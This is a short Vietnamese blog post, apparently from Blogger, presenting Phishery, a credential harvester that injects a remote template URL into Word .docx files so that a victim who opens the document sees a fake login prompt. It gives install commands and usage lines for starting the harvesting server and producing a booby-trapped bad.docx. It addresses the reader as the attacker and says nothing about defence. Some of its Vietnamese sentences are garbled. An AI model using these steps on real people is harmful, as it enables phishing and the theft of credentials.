Breaking

Phishery - Sự nguy hiểm của file .Doc

Phishery là gì?


Phishery giống như là một HTTP được Kích hoạt SSL đơn giản với mục đích chính là xác thực thông tin Basic Authentication.
Phishery có thể trên URL vào tài liệu .docx Word.
Sức mạnh của phishery được phát huy tốt nhất bằng cách thiết lập một mẫu của tài liệu Word.

Cài đặt & Cấu hình

Phishery được viết bằng ngôn ngữ lập trình Go và tác giả của công cụ này đã phát hành nhiều phiên bản cho Windows / OSX / Linux.
Tải phiên bản mới nhất tại đây.

Một khi nạn nhân của bạn mở một tệp tin bad.docx Word sau đó nó sẽ kết nối một với URL nhất định (https://fakebook.com). Và sau đó hộp thoại đăng nhập sẽ xuất hiện nếu kết nối được thiết lập.
phishery-first

Install

Extract the archive, and optionally, install binary to $PATH
$ tar -xzvf phishery*.tar.gz
$ cd phishery*
$ cp phishery /usr/local/bin

Usage

$ phishery --help

|\   \\\\__   O         __    _      __
| \_/    o \  o  ____  / /_  (_)____/ /_  ___  _______  __
> _   (( <_ oO  / __ \/ __ \/ / ___/ __ \/ _ \/ ___/ / / /
| / \__+___/   / /_/ / / / / (__  ) / / /  __/ /  / /_/ /
|/     |/     / .___/_/ /_/_/____/_/ /_/\___/_/   \__, /
             /_/ Basic Auth Credential Harvester (____/
                 with Word Doc Template Injector

  Start the server  : phishery -s settings.json -c credentials.json
  Inject a template : phishery -u https://secure.site.local/docs -i good.docx -o bad.docx

  Options:
    -h, --help      Show usage and exit.
    -v              Show version and exit.
    -s              The JSON settings file used to setup the server. [default: "settings.json"]
    -c              The JSON file to store harvested credentials. [default: "credentials.json"]
    -u              The phishery URL to use as the Word document template.
    -i              The Word .docx file to inject with a template URL.
    -o              The new Word .docx file with the injected template URL.

No comments:

Powered by Blogger.